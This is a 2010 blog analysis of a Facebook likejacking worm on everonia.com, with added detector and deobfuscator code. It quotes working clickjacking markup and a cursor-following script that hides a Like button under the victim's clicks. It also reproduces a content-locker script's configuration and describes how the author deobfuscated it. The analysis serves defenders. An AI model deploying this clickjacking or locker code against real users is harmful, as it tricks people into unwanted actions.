Tuesday, September 21, 2010

"The Hottest girls on Facebook" everonia.com malware analysis

Another worm spreading via the clickjacking technique is now active, targeting Facebook users. If your FB friends' feeds display something similar to this:

The hottest girls on facebook on everonia.com

don't follow the link. If you're curious what is happening and how the attack works, read on.

The clickjacking part

When following the link (it can be blocked by Facebook any minute, so hurry), you reach an everonia.com page promising to show you the top 25 hottest girls on FB. The page looks like this:

But something weird happens once you try to continue. I've made a quick video of the everonia.com clickjacking to show what's really going on:


Fetching the page source, one can easily see the clickjacking frame:
<div style="overflow: hidden; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="aaaa">       
     <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Feveronia.com%2F&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;font&amp;colorscheme=dark&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:20px; height:20px;" allowTransparency="true" id="xxx" name="xxx"></iframe>
    </div>
and the code that moves the frame with the mouse movements so that it always appears where the cursor is:
var xxx = 0;
// aaaa is a div encapsulating the iframe
var aaaa = document.getElementById('aaaa');
var standardbody = (document.compatMode == "CSS1Compat") ? document.documentElement : document.body;

// reposition the frame
function lololol(e) {
  // account for different browsers (IE/others)
  if (window.event) {
    aaaa.style.top = (window.event.y - 5) + standardbody.scrollTop + 'px';
    aaaa.style.left = (window.event.x - 5) + standardbody.scrollLeft + 'px';
  }
  else {
    aaaa.style.top = (e.pageY - 5) + 'px';
    aaaa.style.left = (e.pageX - 5) + 'px';
  }
}
// attach to mouse movements
document.onmousemove = function(e) {
  if (xxx == 0) { lololol(e); }
};
So it's a simple clickjacking page that tricks users into clicking on the page (top 25 girls, remember? ;) ) when in fact they are clicking the invisible Like button, liking the site on Facebook and so spreading it among other FB users. But what's more interesting is what happens next.
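To turn the pattern above into something a defender can run over captured page sources, here is a small static triage check written for this post (it is an added example, not code from the original post or from the everonia.com page). It looks for the three ingredients of the like-jacking page: a Facebook Like plugin iframe, a wrapper styled invisible with one of the opacity spellings used above, and a mousemove handler that rewrites an element's top/left so it shadows the cursor. Both sample pages are constructed for this example; the suspicious one reuses the markup and script quoted above, the benign one is an ordinary visible Like button.

```javascript
// Added example, not code from the original post: static triage for the
// like-jacking pattern (invisible Like plugin iframe that follows the mouse).

// 1. A Facebook Like plugin iframe (many legitimate pages have one).
const LIKE_PLUGIN_RE = /<iframe\b[^>]*\bsrc=["'][^"']*facebook\.com\/plugins\/like\.php/i;
// 2. An element made fully transparent, in any of the vendor spellings seen on the page
//    (opacity, -moz-opacity, -khtml-opacity, or the old IE filter:alpha(opacity=0)).
const INVISIBLE_RE =
  /(?:^|[^\w-])(?:-moz-opacity|-khtml-opacity|opacity)\s*:\s*0(?:\.0+)?\s*(?:[;"'}]|$)|filter\s*:\s*alpha\(\s*opacity\s*=\s*0\s*\)/im;
// 3. A mousemove handler together with code that rewrites style.top / style.left.
const MOUSE_HANDLER_RE = /\bonmousemove\b|addEventListener\s*\(\s*["']mousemove["']/i;
const REPOSITION_RE = /\.style\.(?:top|left)\s*=/i;

// Returns which indicators were seen plus a simple verdict. A single indicator is
// normal (Like buttons are common, and opacity:0 is used for fade-in effects), so the
// verdict needs two for "suspicious" and all three for the full like-jacking pattern.
function findClickjackingIndicators(html) {
  const indicators = {
    likePlugin: LIKE_PLUGIN_RE.test(html),
    invisibleElement: INVISIBLE_RE.test(html),
    cursorFollowing: MOUSE_HANDLER_RE.test(html) && REPOSITION_RE.test(html),
  };
  const score = Object.values(indicators).filter(Boolean).length;
  const verdict = score === 3 ? 'likejacking' : score === 2 ? 'suspicious' : 'benign';
  return { ...indicators, score, verdict };
}

// Constructed sample: the everonia.com markup and mouse-tracking script quoted above.
const SUSPICIOUS_PAGE = `
<div style="overflow: hidden; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="aaaa">
  <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Feveronia.com%2F&amp;layout=standard" style="border:none; overflow:hidden; width:20px; height:20px;" id="xxx"></iframe>
</div>
<script>
var aaaa = document.getElementById('aaaa');
function lololol(e) { aaaa.style.top = (e.pageY - 5) + 'px'; aaaa.style.left = (e.pageX - 5) + 'px'; }
document.onmousemove = function(e) { lololol(e); };
</script>`;

// Constructed sample: an ordinary, visible Like button on a fictional site.
const BENIGN_PAGE = `
<div id="share">
  <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fexample.com%2F&amp;layout=standard"
          scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;"></iframe>
</div>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(findClickjackingIndicators(SUSPICIOUS_PAGE)); // verdict: 'likejacking'
  console.log(findClickjackingIndicators(BENIGN_PAGE));     // verdict: 'benign'
}
```

The regexes are deliberately loose, because attacker markup varies; treat the result as a reason to look at the page by hand, as the video above does, not as proof on its own.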

Human Verification Process

The page quickly redirects to a second page (2.htm), which looks like this:
Everonia.com - human verification process.
The mouse context menu is disabled and you're being tempted into clicking one of those links. The script performing the actions (lock.js) is obfuscated and was bought from BlackHatCodeBreaker.com, a website selling a script that... well, let's just cite them:
The idea is simple: people come to your page, and it looks tempting. They want to access your content or download some freebie - but HEY - Your content is locked! Now all they need to do is just fill-in this short offer...

BlackHat CodeBreaker lets you monetize your content by requiring users to complete CPA surveys to gain access to your content. And the nicest part is, it lets you do so even if you don't have any content!
So, the script (they sell it for $79) displays advertising links that the website owner earns CPA income from, and it "locks the page" so the (most likely fake) content cannot be reached before one of the links is clicked; that is the Human Verification Process dialog. Indeed, look at the lock.js variables:
// 1. TEXT FIELDS (see section 3.3.1 in the manual)
  // HEADLINE
  var blocker_headline = 'Human Verification Process';

  // INSTRUCTIONAL TEXT ABOVE THE LINKS
  var blocker_instructionalText = 'This window will close once you have completed one of the following tasks.';

  // FOOTER TEXT BELOW THE LINKS
  var blocker_footerText = 'This is to prevent Bots from entering into our site';

// 2. TIMERS (see section 3.3.2 in the manual)
  // UNLOCKING TIMER, in Seconds
  var timeout_in_seconds_from_click = 300;

  // TEASE TIMER, in Seconds
  var tease_timer = 0;

  // COOKIE DURATION, in Days, Hours and Minutes
  var cookie_duration_days = 1000;
  var cookie_duration_hours = 0;
  var cookie_duration_minutes = 0;
 
// 3. BASIC CONFIGURATION (see section 3.3.3 in the manual)
  // BHCB FILES PATH 
     // The path to the directory holding all Blackhat Codebreaker files (lock.js, links.txt, goto.php, goto2.php, lock.png etc.)
     // The path must not have more than 90 characters
     // If the files are at the same place as the locked page, use:
     //    var bhcb_files_path = '';
     // If they are at another directory, provide its path
     // For WordPress blogs I recommend using: 
     //    var bhcb_files_path = '/wp-content/plugins/bhcb/';
  var bhcb_files_path = '';

  // HIDE REFERRER ('YES' Hides Referrer, 'NO' Does not hide the referrer)
  var hide_referrer = 'YES';

  // UNLOCK ENTIRE SITE ('YES') OR JUST THIS DIRECTORY ('NO')
  var unlock_entire_site = 'NO';
    
  // RANDOMIZE CPA OFFERS ('YES'), and how many offer links to display when randomizing
  var random_link_rotation = 'YES';
  var number_of_links_to_display = 4;
    
  // TEST MODE ('NO' for operational pages, 'YES' when testing your setup, always return to 'NO' when you finish testing)
  var test_mode = 'NO';

  // BLOCK RIGHT CLICK MENU ('YES' disables right-click menu, 'NO' doesn't disable)
  var block_rightclick_menu = 'YES';

// 4. LOOK AND FEEL (see section 3.3.4 in the manual)
  // POSITION AND WIDTH OF LOCK PANEL, in Pixels
  var panel_vertical_position = 200;
  var panel_width = 500;

  // BACKGROUND COLOR AND IMAGE
     // * background_color controls the background color of the lock panel. Value is given in Hex RGB.
     //   For example, background_color = '#FFFF00' Will result in a Yellow background. Default is '#FFFFFF' (White)
     // * border_color controls the color of the lock panel's border. Value is given in Hex RGB. Default is '#CCCCCC' (Light Gray)
     // * background_image is the name of the background image to use in the lock panel. Default is 'lock.png' (the green padlock image)
     // * background_image_repeat specifies (images smaller than the lock panel) whether to repeat the image ('YES') or show it only once ('NO'). Default is 'NO'.
  var background_color = '#FFFFFF';
  var border_color = '#CCCCCC';
  var background_image = 'lock.png';
  var background_image_repeat = 'NO';
  
  // HAZE COLOR AND OPACITY
     // haze_color controls the haze covering your page content, in Hex RGB. Default is '#000000' (Black)
     // haze_opacity controls the opacity of the haze. 
     //    0 is completely transparent, 100 is completely opaque. Default is 50
  var haze_color = '#000000';
  var haze_opacity = 50;
  
  // TEXT COLORS, in Hex RGB.
     // Defaults are: headline_color = '#466805' (GREENISH), instructionalText_color = '#000000' (BLACK),
     //    footerText_color = '#000000' (BLACK) and links_color = '#0000FF' (BLUE)
  var headline_color = '#466805';
  var instructionalText_color = '#000000';
  var footerText_color = '#000000';
  var links_color = '#0000FF';
So this explains everything: the website is set up to collect CPA money from Facebook users and does not host any malware (for now). But I have a

Bonus for patient readers

The lock.js script is obfuscated. I don't like obfuscation, so I present to you a fully deobfuscated version of the BlackHatCodeBreaker.com file (you don't have to pay $$ for this shitty software). It turned out that the code:
  • reads links from links.txt file fetched by XmlHttpRequest
  • randomizes the links, optionally limiting them
  • blocks mouse clicks & mouse context menu
  • processes the links through two redirect scripts, get.php and get2.php, to lose the HTTP Referer header (hey, that's what they claim)
  • displays the links within a padlock dialog
  • after clicking, the page is optionally "unlocked"

Deobfuscation process

Beating this obfuscation was, as always, fun. At the beginning it had a dictionary array of all the strings used. First I had to convert the JavaScript hex-encoded strings [1.js] to plain ones [2.js] (Python helped).
// 1.js
var _0x5f02=[
"\x74\x65\x78\x74\x2F\x78\x6D\x6C",
"\x6F\x76\x65\x72\x72\x69\x64\x65\x4D\x69\x6D\x65\x54\x79\x70\x65",
...
// 2.js
var _one = [
  'text/xml',
  'overrideMimeType',
...
Then I had to dereference all dictionary calls [3.js]:
// replace this:
oxmlhttp[_one[1]](_one[0]);
// with this:
oxmlhttp['overrideMimeType']('text/xml');
Unix nl, regular expressions and PHP str_replace() proved themselves useful at this point.

After all that I only had to replace the variable names with readable ones and interpret the resulting code [4.js]. As usual, all files are stored on my github page so you can experiment yourselves.
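The two mechanical steps of that process, decoding the hex-escaped dictionary (1.js to 2.js) and replacing every dictionary reference with its string literal (3.js), can be done in one script. The Node.js version below is an added example for this post, not the author's tooling (which used Python, nl, regular expressions and PHP str_replace()) and not part of lock.js. The OBFUSCATED sample is constructed: the array name and its first two strings are the ones quoted above, the third string and the surrounding lines are made up to give the dereferencing step something to work on.

```javascript
// Added example, not from the original post: decode a string-dictionary obfuscation
// and inline the dictionary references, without eval'ing the untrusted script.

// Constructed sample in the 1.js style: hex-escaped dictionary plus code that indexes it.
const OBFUSCATED = `var _0x5f02=["\\x74\\x65\\x78\\x74\\x2F\\x78\\x6D\\x6C","\\x6F\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x4D\\x69\\x6D\\x65\\x54\\x79\\x70\\x65","\\x47\\x45\\x54"];
var oxmlhttp=new XMLHttpRequest();
oxmlhttp[_0x5f02[1]](_0x5f02[0]);
oxmlhttp.open(_0x5f02[2],'links.txt',false);`;

// Matches "var NAME = [ ... ];" where the body is the string dictionary.
const DICT_RE = /var\s+([A-Za-z_$][\w$]*)\s*=\s*\[([\s\S]*?)\];/;
// Matches one double- or single-quoted JS string literal, honouring backslash escapes.
const LITERAL_RE = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;

// Step 1: turn \xHH, \uHHHH and the common single-character escapes into real characters.
function decodeEscapes(s) {
  const simple = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v', '0': '\0' };
  return s.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})|\\(.)/gi, (m, hex2, hex4, ch) => {
    if (hex2) return String.fromCharCode(parseInt(hex2, 16));
    if (hex4) return String.fromCharCode(parseInt(hex4, 16));
    return ch in simple ? simple[ch] : ch; // \\ \" \' and unknown escapes: keep the char
  });
}

// Find the dictionary declaration and return its name, decoded entries and raw text.
function extractDictionary(src) {
  const m = DICT_RE.exec(src);
  if (!m) return null;
  const entries = [];
  let lit;
  while ((lit = LITERAL_RE.exec(m[2])) !== null) {
    entries.push(decodeEscapes(lit[1] !== undefined ? lit[1] : lit[2]));
  }
  return { name: m[1], entries, declaration: m[0] };
}

// Step 2: replace NAME[index] with a single-quoted literal of the decoded string.
function dereference(src, dict) {
  const escapedName = dict.name.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  const refRe = new RegExp(escapedName + '\\[(\\d+)\\]', 'g');
  return src.replace(refRe, (ref, idx) => {
    const i = Number(idx);
    if (i >= dict.entries.length) return ref; // out-of-range index: leave it for manual review
    const quoted = dict.entries[i].replace(/\\/g, '\\\\').replace(/'/g, "\\'");
    return "'" + quoted + "'";
  });
}

// Both steps: returns the decoded dictionary and the code with references inlined
// and the dictionary declaration itself removed.
function deobfuscate(src) {
  const dict = extractDictionary(src);
  if (!dict) return { dictionary: [], code: src };
  const code = dereference(src.replace(dict.declaration, ''), dict).replace(/^\s+/, '');
  return { dictionary: dict.entries, code };
}

if (typeof require !== 'undefined' && require.main === module) {
  const result = deobfuscate(OBFUSCATED);
  console.log(result.dictionary); // [ 'text/xml', 'overrideMimeType', 'GET' ]
  console.log(result.code);       // oxmlhttp['overrideMimeType']('text/xml'); ...
}
```

The decoder never evaluates the script; it only rewrites text, which matters because the file being analysed is hostile. Out-of-range indices are left in place rather than guessed so that a second dictionary, or a reference the regex did not understand, shows up in the output for manual review.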

If you'd like to know more about Facebook worms and Facebook security, browse my site for the 'facebook' tag.

1 comment:

NBAY said...

Wow. That was totally interesting!  Thanks for the knowledge. Most of it is over my head but I want to learn how to code.  So I did enjoy the read.  Thank you for sharing.

Now off to check out your website. (smile)
http://www.NBAYclassifieds.com